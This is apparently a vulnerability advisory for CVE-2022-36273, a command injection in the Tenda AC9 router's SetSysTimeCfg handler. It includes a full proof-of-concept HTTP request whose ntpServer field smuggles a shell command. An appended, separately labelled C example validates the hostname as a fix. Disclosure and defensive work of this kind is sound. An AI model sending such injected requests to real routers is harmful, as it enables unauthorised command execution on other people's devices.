CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.


The Ntpserver parameter is passed to tip_sntp_handle->doSystemCmd, which results in a command injection vulnerability.

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 76
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
Connection: close

timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00
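As an added example, not part of this advisory or of the Tenda firmware, the kind of input gate that should sit between the ntpServer parameter and any command string: a strict RFC 1123 hostname/IPv4 validator. The function name and the accepted alphabet are my assumptions; the sample inputs are constructed, with the payload taken from the request above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if s is a syntactically valid hostname or IPv4 literal under
 * RFC 1123 label rules, 0 otherwise. Only [A-Za-z0-9.-] is accepted, so
 * shell metacharacters ('|', '"', '>', space) never reach doSystemCmd. */
int validate_ntp_server(const char *s)
{
    size_t len, label_len = 0;

    if (s == NULL || (len = strlen(s)) == 0 || len > 253)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            /* A label must be non-empty and must not end in '-'. */
            if (label_len == 0 || s[i - 1] == '-')
                return 0;
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-') || (label_len == 0 && c == '-'))
            return 0;               /* bad character or leading '-' */
        if (++label_len > 63)
            return 0;               /* label longer than 63 octets */
    }
    /* Reject a trailing dot or a trailing hyphen in the last label. */
    return label_len > 0 && s[len - 1] != '-';
}

int main(void)
{
    /* Constructed inputs: legitimate servers plus the payload quoted above. */
    const char *inputs[] = {
        "time.windows.com", "192.168.0.1",
        "\"time.windows.com| ls > /tmp/f0und\"", "-bad.example.com", "trailing.dot.",
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-40s -> %s\n", inputs[i],
               validate_ntp_server(inputs[i]) ? "accepted" : "rejected");
    return 0;
}
```

A validated hostname should still be handed to the NTP client as a separate argv element (execv-style) rather than interpolated into a shell string, so the validator is defence in depth, not the only barrier.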
